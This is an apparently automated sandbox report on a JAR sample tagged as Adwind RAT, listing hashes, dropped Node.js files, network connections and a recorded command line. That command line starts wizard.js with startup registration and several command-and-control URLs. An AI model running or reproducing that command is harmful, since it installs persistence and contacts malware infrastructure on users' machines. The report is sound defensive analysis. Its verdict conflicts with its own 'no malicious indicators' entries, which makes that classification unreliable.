File name: Kafan_Sample_d06a88f0edeaf77c468dbabb3580bc6ba4812be5eec6cb8446b9f7f41bcc2494.jar
Full analysis: https://app.any.run/tasks/f0bf0269-eb78-48cc-aec1-9fb53823d4d4
Verdict: Malicious activity
Threats:

Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.

Analysis date: May 30, 2020, 07:22:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, adwind, rat
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: BCF2D1A52DCBAA0A5AF0867DF9E1287D
SHA1: 3AB1CCE1CC4D351680F39AD199EDB361A50C9D2F
SHA256: D06A88F0EDEAF77C468DBABB3580BC6BA4812BE5EEC6CB8446B9F7F41BCC2494
SSDEEP: 96:UVtx7MmLa9EoxR7ouqA+j24UmWX9QEtFvCJDEbyjfLJA0fpIb43N7xBh3glP:Ix7box5pqAvjja9UyjdApE3N1OP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • javaw.exe (PID: 632)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 632)
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipFileName: META-INF/
ZipUncompressedSize: -
ZipCompressedSize: 2
ZipCRC: 0x00000000
ZipModifyDate: 2020:05:25 09:15:11
ZipCompression: Deflated
ZipBitFlag: 0x0808
ZipRequiredVersion: 20
No data.
Screenshot: all screenshots are available in the full report

Total processes: 38
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 0

Behavior graph

start -> javaw.exe -> node.exe (no specs)

Process information

PID: 632
CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\Desktop\Kafan_Sample_d06a88f0edeaf77c468dbabb3580bc6ba4812be5eec6cb8446b9f7f41bcc2494.jar"
Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
Indicators: -
Parent process: explorer.exe
User: admin
Company: Oracle Corporation
Integrity Level: MEDIUM
Description: Java(TM) Platform SE binary
Version: 8.0.920.14

PID: 3192
CMD: C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://central.qhub.qua.one --central-base-url https://3769683.middlegate.qua.one --central-base-url https://fake1.3769683.middlegate.qua.one --central-base-url invalid.https://3769683.middlegate.qua.one
Path: C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe
Indicators: -
Parent process: javaw.exe
User: admin
Company: Node.js
Integrity Level: MEDIUM
Description: Node.js: Server-side JavaScript
Version: 13.13.0
Total events: 7
Read events: 7
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 0
Text files: 1 750
Unknown types: 11

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node.exe | - | - | -
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\CHANGELOG.md | html | 4B4151CB6CA2A9CD66238FB8EEC003A3 | 271FCB46F0552F847E6E5B88CDDD03168ED11E6E354B1C15FA92ED553B92EF5B
632 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | 361D219D65364A751C2B5550F08995FC | 272294178E9EEEBAF53749AB667A88B9897DB0B092A600AB3F9F0D9500C85917
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\install_tools.bat | text | 4E46AD93BAC466280DED1D0C19863A26 | 4B1E875422E7A3BA28DC1A618E7569A27E2A491C161E0ADB742434B14F773BED
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\LICENSE | text | 698CF46FBBD1EF7145D1D4F4977E9743 | EAC4065F78A73669E3058A72CB936D5C79E7CE766C6ACF87A6AB37CF8D702064
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\.npmignore | text | 4416DF8582A08A4C3297F4DD5DE3908B | F885519DB536EC02B192521A48D63E2EE9B849092905D117E07A862DBB6C73B1
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\nodevars.bat | text | E6636C5B093F5CC13DFB7508305B8D8B | A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_etw_provider.man | text | 1D51E18A7247F47245B0751F16119498 | 1975AA34C1050B8364491394CEBF6E668E2337C3107712E3EECA311262C7C46F
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\bin\npx.cmd | text | D679D19CFAB093D75D4B75672A0BA98A | B6004636A98CBB9814FDFC98BB7365E78AB48B3208F60AC5B2F17794C5285F26
632 | javaw.exe | C:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\.licensee.json | text | B133415ABE39E5C1865AAD84712B3941 | 66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 4
DNS requests: 3
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
632 | javaw.exe | 104.20.23.46:443 | nodejs.org | Cloudflare Inc | US | shared
632 | javaw.exe | 64.225.101.88:443 | central.qhub.qua.one | Peer 1 Network (USA) Inc. | US | malicious

DNS requests

Domain | IP | Reputation
nodejs.org | 104.20.23.46, 104.20.22.46 | whitelisted
central.qhub.qua.one | 64.225.101.88 | whitelisted

Threats

2 ETPRO signatures available at the full report
No debug info